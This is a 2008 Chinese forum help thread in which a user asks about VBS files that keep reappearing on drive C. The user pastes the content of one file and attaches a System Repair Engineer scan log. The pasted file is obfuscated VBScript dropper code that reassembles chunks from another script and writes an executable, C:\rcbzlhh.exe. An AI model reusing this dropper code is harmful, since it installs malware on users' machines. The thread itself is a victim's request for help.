‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[求助] 中了VBS 结尾病毒怎么办

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
1楼 发表于 2008-9-21 14:35  只看该作者

中了VBS 结尾病毒怎么办

电脑C盘没事就生成VBS 结尾的文件,然后涮新一次 他就增大一次, 过阵又会生多两个,用金山和360都说不是病毒,然后金山时时刻刻 会报出杀毒信息,, 已经快3个星期。。。。

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
2楼 发表于 2008-9-21 14:39  只看该作者

补充

把VBS改为TXT文件打开 一看里面写了 这些
on ErRoR rEsume NexT:W=1:Do:SET j=CReaTEObjEcT("SCrIPTIng.FILesYSTEMobjECT"):dO WHiLE J.FilEexIsts("C:\hxsydg.vbs")=fAlSE:wscRiPt.SlEEP(1000):looP:SEt l=J.oPeNtextFIlE("C:\hxsydg.vbs",1):do wHIlE L.ATeNdOFstREAm=FAlse:b=L.REAdLINE:Y=lEn(b):a=LeFT(B,2):seLecT CASE tRUE:cASe isnumERiC(a)=FalSE:CAsE Y=3949+3 aNd iNt(a)=W:u=U+miD(b,3,3949):w=W+1:cASe y=2534+3 And InT(A)=w:u=u+MiD(B,3,2534):W=w+1:END sELECT:LOOP:l.closE:IF 67+1=w tHEn:i=Len(U)/2:SEt P=cReATeObject("ADOdB.ReCOrDsET"):P.FIelDs.aPpEnd "m",205,I:P.opeN:P.adDneW:p("M")=u:P.UPDAte:u=P("m").getcHUNk(I):WItH CrEATEobJECT("ADOdb.sTReam"):.MODE=3:.tyPE=1:.oPeN():.wRiTe u:.saveTOFILe "C:\rcbzlhh.exe",2:eND With:WScRiPt.QuiT:End iF:wScRIPt.SlEEP(200):LOoP



另外一个写的是

TOP

KSDB6008951

新兵

积分
16 
威望
34  
元宝
0  
铜钱
24  
3楼 发表于 2008-9-21 15:09  只看该作者

扫描结果

复制内容到剪贴板
代码:
2008-09-21,14:55:16

System Repair Engineer 2.6.12.1018
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 2 (Build 2600) - 管理权限用户 - 完整功能

以下内容被选中:
    所有的启动项目(包括注册表、启动文件夹、服务等)
    浏览器加载项
    正在运行的进程(包括进程模块信息)
    文件关联
    Winsock 提供者
    Autorun.inf
    HOSTS 文件
    进程特权扫描


启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe>  [(Verified)Microsoft Windows Publisher]
    <KavPFW><"E:\Kingsoft Internet Security 2008\KPFW32.EXE" -startup>  [(Verified)"Zhuhai  Kingsoft Software Co.,Ltd"]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <load><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <RTHDCPL><RTHDCPL.EXE>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <Alcmtr><ALCMTR.EXE>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <amd_dc_opt><C:\Program Files\AMD\Dual-Core Optimizer\amd_dc_opt.exe>  [AMD]
    <360Safetray><D:\360safe\safemon\360tray.exe /start>  [(Verified)Qizhi Software (beijing) Co. Ltd]
    <360Safebox><"C:\Program Files\360Safebox\safeboxTray.exe" /r>  [(Verified)Qizhi Software (beijing) Co. Ltd]
    <KavStart><"E:\Kingsoft Internet Security 2008\KAVStart.exe" -startup>  [(Verified)"Zhuhai  Kingsoft Software Co.,Ltd"]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <shell><Explorer.exe>  [(Verified)Microsoft Windows Component Publisher]
    <Userinit><C:\WINDOWS\system32\userinit.exe>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <AppInit_DLLs><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <UIHost><logonui.exe>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
    <Internet Explorer><%systemroot%\system32\shmgrate.exe OCInstallUserConfigIE>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
    <Outlook Express><%systemroot%\system32\shmgrate.exe OCInstallUserConfigOE>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
    <Themes Setup><%SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
    <Microsoft Outlook Express 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
    <NetMeeting 3.01><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
    <Windows Messenger 4.7><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
    <Microsoft Windows Media Player><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp10.inf,PerUserStub>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
    <通讯簿 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install>  [File is missing]
[HKEY_CURRENT_USER\Control Panel\Desktop]
    <SCRNSAVE.EXE><C:\WINDOWS\system32\夜光时钟.scr>  []

==================================
启动文件夹
[宽带连接]
  <C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\宽带连接.lnk -->  [File is missing]><N>

==================================
服务
[Adobe LM Service / Adobe LM Service][Stopped/Manual Start]
  <"C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe"><Adobe Systems>
[Ati HotKey Poller / Ati HotKey Poller][Stopped/Disabled]
  <C:\WINDOWS\system32\Ati2evxx.exe><ATI Technologies Inc.>
[Contrl Center of Storm Media / ccosm][Running/Auto Start]
  <E:\暴风影院\stormliv.exe /asservice><北京暴风网际科技有限公司>
[Kingsoft Internet Security Common Service / KISSvc][Running/Auto Start]
  <E:\Kingsoft Internet Security 2008\KISSvc.EXE><Kingsoft Corporation>
[Kingsoft Personal Firewall Service / KPfwSvc][Running/Auto Start]
  <"E:\Kingsoft Internet Security 2008\KPfwSvc.EXE"><Kingsoft Corporation>
[Kingsoft Antivirus KWatch Service / KWatchSvc][Running/Auto Start]
  <"E:\Kingsoft Internet Security 2008\KWatch.EXE"><Kingsoft Corporation>

==================================
驱动程序
[aaatimeo / aaatimeo][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\aaatimeo.sys><Microsoft Corporation>
[Intel(r) 82801 Audio Driver Install Service (WDM) / ac97intc][Stopped/Manual Start]
  <system32\drivers\ac97intc.sys><Intel Corporation>
[AFAMgt / AFAMgt][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\afamgt.sys><Adaptec, Inc.>
[ahcix86 / ahcix86][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ahcix86.sys><ATI Technologies Inc.>
[AliIde / AliIde][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\aliide.sys><Acer Laboratories Inc.>
[AMD AGP Bus Filter Driver / amdagp][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\amdagp.sys><Advanced Micro Devices, Inc.>
[amdbusdr / amdbusdr][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\amdbusdr.sys><AMD>
[AMD EIDE 驱动程衼E / amdeide][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\AmdEide.sys><AMD>
[AMD Processor Driver / AmdK8][Running/System Start]
  <System32\DRIVERS\amdk8.sys><Advanced Micro Devices>
[AMD Low Level Device Driver / AmdLLD][Running/Manual Start]
  <system32\DRIVERS\AmdLLD.sys><AMD, Inc.>
[SiI-3112 SATALink  Controller / ASH1205][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ASH1205.sys><Silicon Image, Inc.>
[ata1200a / ata1200a][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ata1200a.sys><Adaptec, Inc.>
[ati2mtag / ati2mtag][Running/Manual Start]
  <system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[atiide / atiide][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\atiide.sys><ATI Technologies Inc.>
[Promise driver accelerator / bb-run][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\bb-run.sys><Promise Technology, Inc.>
[DELL CERC SATA 1.5/6ch RAID Miniport Driver / cercsr6][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\cercsr6.sys><Adaptec, Inc.>
[CmdIde / CmdIde][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\cmdide.sys><CMD Technology, Inc.>
[Cpq32fs2 / Cpq32fs2][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\Cpq32fs2.sys><Hewlett-Packard Company>
[Promise Removable Disk Control Driver / dontgo][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\DontGo.sys><Promise Technology, Inc.>
[VIA PCI 10/100Mb Fast Ethernet Adapter NT Driver / FETNDIS][Stopped/Manual Start]
  <system32\DRIVERS\fetnd5.sys><VIA Technologies, Inc.>
[fttxr52P / fttxr52P][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\fttxr52P.sys><Promise Technology, Inc.>
[Microsoft 用于 High Definition Audio 的 UAA 总线驱动程序 / HDAudBus][Running/Manual Start]
  <system32\DRIVERS\HDAudBus.sys><Windows (R) Server 2003 DDK provider>
[HpCISSm2 / HpCISSm2][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\HpCISSm2.sys><Hewlett-Packard Company>
[hptmv6 / hptmv6][Stopped/Boot Start]
  <\SystemRoot\system32\DRIVERS\hptmv6.sys><HighPoint Technologies, Inc.>
[Intel  RAID Controller / iaStor55][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\iaStor55.sys><Intel Corporation>
[Intel RAID  Controller / iaStor70][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\iaStor70.sys><Intel Corporation>
[Service for Realtek HD Audio (WDM) / IntcAzAudAddService][Running/Manual Start]
  <system32\drivers\RtkHDAud.sys><Realtek Semiconductor Corp.>
[KAVBase / KAVBase][Running/Auto Start]
  <\??\C:\WINDOWS\system32\Drivers\KAVBase.sys><Kingsoft Corporation>
[KAVBootC / KAVBootC][Running/Boot Start]
  <\SystemRoot\system32\Drivers\KAVBootC.sys><Kingsoft Corporation>
[KAVSafe / KAVSafe][Running/Auto Start]
  <\??\C:\WINDOWS\system32\Drivers\KAVSafe.sys><Kingsoft Corporation>
[KNetWch / KNetWch][Running/System Start]
  <\??\E:\Kingsoft Internet Security 2008\KNetWch.SYS><Kingsoft Corporation>
[KWatch3 / KWatch3][Running/Auto Start]
  <\??\C:\WINDOWS\system32\Drivers\KWatch3.sys><Kingsoft Corporation>
[mv61xx / mv61xx][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\mv61xx.sys><Marvell Semiconductor, Inc.>
[mvSata / mvSata][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\mvsata.sys><Marvell Semiconductors Inc.>
[nv / nv][Stopped/Manual Start]
  <system32\DRIVERS\nv4_mini.sys><NVIDIA Corporation>
[NVATABUS / NVATABUS][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\nvatabus.sys><NVIDIA Corporation>
[NVIDIA nForce Networking Controller Driver / NVENETFD][Running/Manual Start]
  <system32\DRIVERS\NVENETFD.sys><NVIDIA Corporation>
[nvgts / nvgts][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\nvgts.sys><NVIDIA Corporation>
[NVIDIA Network Bus Enumerator / nvnetbus][Running/Manual Start]
  <system32\DRIVERS\nvnetbus.sys><NVIDIA Corporation>
[NVIDIA nForce RAID Driver / nvrd32][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\nvrd32.sys><NVIDIA Corporation>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
  <system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[ql2100 / ql2100][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ql2100.sys><QLogic Corporation>
[ql2200 / ql2200][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ql2200.sys><QLogic Corporation>
[rr172x / rr172x][Stopped/Boot Start]
  <\SystemRoot\system32\DRIVERS\rr172x.sys><HighPoint Technologies, Inc.>
[rr174x / rr174x][Stopped/Boot Start]
  <\SystemRoot\system32\DRIVERS\rr174x.sys><HighPoint Technologies, Inc.>
[rr2340 / rr2340][Stopped/Boot Start]
  <\SystemRoot\system32\DRIVERS\rr2340.sys><HighPoint Technologies, Inc.>
[SafeBoxKrnl / SafeBoxKrnl][Running/System Start]
  <\??\C:\Program Files\360Safebox\SafeBoxKrnl.sys><360安全中心>
[Secdrv / Secdrv][Stopped/Manual Start]
  <system32\DRIVERS\secdrv.sys><Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.>
[SATALink External Device Filter / SiRemFil][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\SiRemFil.sys><Silicon Image, Inc.>
[SIS AGP Bus Filter / sisagp][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\sisagp.sys><Silicon Integrated Systems Corporation>
[sisraidx / sisraidx][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\sisraidx.sys><Silicon Integrated Systems Corp.>
[ViBus / ViBus][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ViBus.sys><VIA Technologies, Inc.>
[videX32 / videX32][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\videX32.sys><VIA Technologies, Inc.>
[VIA SATA IDE Device Driver / ViPrt][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ViPrt.sys><VIA Technologies, Inc.>
[VIA SATA IDE Hot-plug Driver / xfilt][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\xfilt.sys><VIA Technologies,Inc>

==================================
浏览器加载项
[ThunderAtOnce Class]
  {01443AEC-0FD1-40fd-9C87-E93D1494C233} <D:\讯雷\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[Thunder Browser Helper]
  {889D2FEB-5411-4565-8998-1DD2C5261283} <D:\讯雷\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[SafeMon Class]
  {B69F34DD-F0F9-42DC-9EDD-957187DA688D} <D:\360safe\safemon\safemon.dll, (Signed) 360.CN>
[kingsoft browser shield]
  {D963BE1A-6B35-47DB-B002-49FAE71D85CC} <E:\Kingsoft Internet Security 2008\KASBrowserShield.DLL, (Signed) Kingsoft Corporation>
[IEBuddyExtControl Class]
  {3AECD3C1-7085-4731-96DC-47B6CF7EF749} <E:\Kingsoft Internet Security 2008\IEBuddyExt.DLL, (Signed) Kingsoft Corporation>
[ThunderAtOnce Class]
  {01443AEC-0FD1-40FD-9C87-E93D1494C233} <D:\讯雷\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[IEBuddyExtControl Class]
  {3AECD3C1-7085-4731-96DC-47B6CF7EF749} <E:\Kingsoft Internet Security 2008\IEBuddyExt.DLL, (Signed) Kingsoft Corporation>
[Thunder Agent Class]
  {485463B7-8FB2-4B3B-B29B-8B919B0EACCE} <D:\讯雷\Thunder\ComDlls\ThunderAgent_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[360SafeLive]
  {87515F61-A66C-4319-A0E0-D416CB8059E3} <D:\360safe\live.dll, (Signed) 360.cn>
[Thunder Browser Helper]
  {889D2FEB-5411-4565-8998-1DD2C5261283} <D:\讯雷\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[SafeMon Class]
  {B69F34DD-F0F9-42DC-9EDD-957187DA688D} <D:\360safe\safemon\safemon.dll, (Signed) 360.CN>
[kingsoft browser shield]
  {D963BE1A-6B35-47DB-B002-49FAE71D85CC} <E:\Kingsoft Internet Security 2008\KASBrowserShield.DLL, (Signed) Kingsoft Corporation>
[]
  {FB5F1910-F110-11D2-BB9E-00C04F795683} <, >
[使用迅雷下载]
  <D:\讯雷\Thunder\Program\geturl.htm, N/A>
[使用迅雷下载全部链接]
  <D:\讯雷\Thunder\Program\getallurl.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
  <res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[添加到QQ表情]
  <D:\qq2008\AddEmotion.htm, N/A>

==================================
正在运行的进程
[PID: 628 / SYSTEM][\SystemRoot\System32\smss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 692 / SYSTEM][\??\C:\WINDOWS\system32\csrss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 732 / SYSTEM][\??\C:\WINDOWS\system32\winlogon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\Ati2evxx.dll]  [ATI Technologies Inc., 6.14.10.4176]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 776 / SYSTEM][C:\WINDOWS\system32\services.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 788 / SYSTEM][C:\WINDOWS\system32\lsass.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 964 / SYSTEM][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1008 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1104 / SYSTEM][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1188 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1268 / LOCAL SERVICE][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1596 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe]  [Microsoft Corporation, 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)]
[PID: 1788 / Administrator][C:\WINDOWS\Explorer.EXE]  [Microsoft Corporation, 6.00.2900.3156 (xpsp_sp2_gdr.070613-1234)]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [D:\讯雷\Thunder\ComDlls\TDAtOnce_Now.dll]  [Thunder Networking Technologies,LTD, 1.0.5.29]
    [D:\讯雷\Thunder\ComDlls\xunleiBHO_Now.dll]  [Thunder Networking Technologies,LTD, 5, 0, 8, 96]
    [C:\WINDOWS\system32\Audiodev.dll]  [Microsoft Corporation, 5.2.3802.3802 built by: dnsrv(bld4act)]
    [C:\Program Files\WinRAR\rarext.dll]  [N/A, ]
    [C:\Program Files\Microsoft Office\OFFICE11\msohev.dll]  [Microsoft Corporation, 11.0.5510]
    [E:\Kingsoft Internet Security 2008\KAVEXT.DLL]  [Kingsoft Corporation, 2008,07,09,459]
    [D:\qq2008\qdshm.dll]  [, 1, 0, 101, 20]
    [D:\qq2008\MFC42.DLL]  [Microsoft Corporation, 6.00.8665.0]
[PID: 1936 / SYSTEM][E:\暴风影院\stormliv.exe]  [北京暴风网际科技有限公司, 3, 8, 8, 15]
    [E:\暴风影院\MSVCP60.dll]  [Microsoft Corporation, 6.02.3104.0]
    [E:\暴风影院\bfoptdll.dll]  [北京暴风网际科技有限公司, 3, 8, 7, 16]
    [E:\暴风影院\box\BoxLog.dll]  [北京暴风网际科技有限公司, 3, 8, 9, 19]
[PID: 2028 / LOCAL SERVICE][C:\WINDOWS\system32\wdfmgr.exe]  [Microsoft Corporation, 5.2.3790.1230 built by: dnsrv(bld4act)]
[PID: 196 / Administrator][C:\WINDOWS\RTHDCPL.EXE]  [Realtek Semiconductor Corp., 2.1.9.1]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
[PID: 996 / Administrator][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2092 / Administrator][D:\qq2008\QQ.exe]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQBaseClassInDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQHelperDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\BasicCtrlDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\MFC42.DLL]  [Microsoft Corporation, 6.00.8665.0]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [D:\qq2008\RICHED32.DLL]  [Microsoft Corporation, 5.00.2134.1]
    [D:\qq2008\RICHED20.dll]  [Microsoft Corporation, 5.31.23.1218]
    [D:\qq2008\QQAPI.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LoginCtrl.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LoginCtrlRes.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQRes.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQMainFrame.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\gdiplus.dll]  [Microsoft Corporation, 5.1.3102.3352 (xpsp_sp2_qfe.080415-1302)]
    [D:\qq2008\QQPlugin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\UnReadMsgMgr.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAllInOne.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\SCCore.dll]  [TENCENT, 1, 6, 0, 2]
    [D:\qq2008\CameraDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\CQQApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\FlashAvatarDll.dll]  [, 1, 0, 0, 1]
    [D:\qq2008\NewSkin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\MailSummary.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSpace.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\vbscript.dll]  [Microsoft Corporation, 5.6.0.7426]
    [E:\Kingsoft Internet Security 2008\Flash.OCX]  [Adobe Systems, Inc., 9,0,124,0]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\msdmo.dll]  [, ]
    [D:\qq2008\OEMApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAvatar.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQKnowledgeSearch.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQGroupMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQPet.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QRingMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSysMsgMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\UserDefinedHead.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQConfigPlugin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQCustomFace.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LongConnection.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\PhoneAPI.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\DialerAllinOne.dll]  [tencent, 1, 4, 0, 0]
    [C:\WINDOWS\system32\msadp32.acm]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [D:\qq2008\BQQApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\CommercesMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\PersonalDesktop.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAddr.dll]  [深圳市腾讯计算机系统有限公司, 5, 0, 101, 330]
    [D:\qq2008\GroupConnection.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\ImageOle.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSceneMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQLiveQMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\qqgroupdisk.dll]  [深圳腾讯科技, 2, 6, 106, 90]
    [D:\qq2008\AddrSearch.dll]  [腾讯科技(深圳)有限公司, 2, 2, 1, 16]
    [D:\qq2008\QQSettingCtrl.dll]  [TENCENT, ]
[PID: 2524 / LOCAL SERVICE][C:\WINDOWS\System32\alg.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2860 / Administrator][C:\WINDOWS\ALCFDRTM.EXE]  [Realtek Semiconductor Corp., 1, 3, 0, 1]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
[PID: 3756 / Administrator][D:\qq2008\TXPlatform.exe]  [Tencent, 1, 5, 225, 0]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
[PID: 3176 / Administrator][D:\qq2008\QQ.exe]  [TENCENT, 8,0,978,1833]
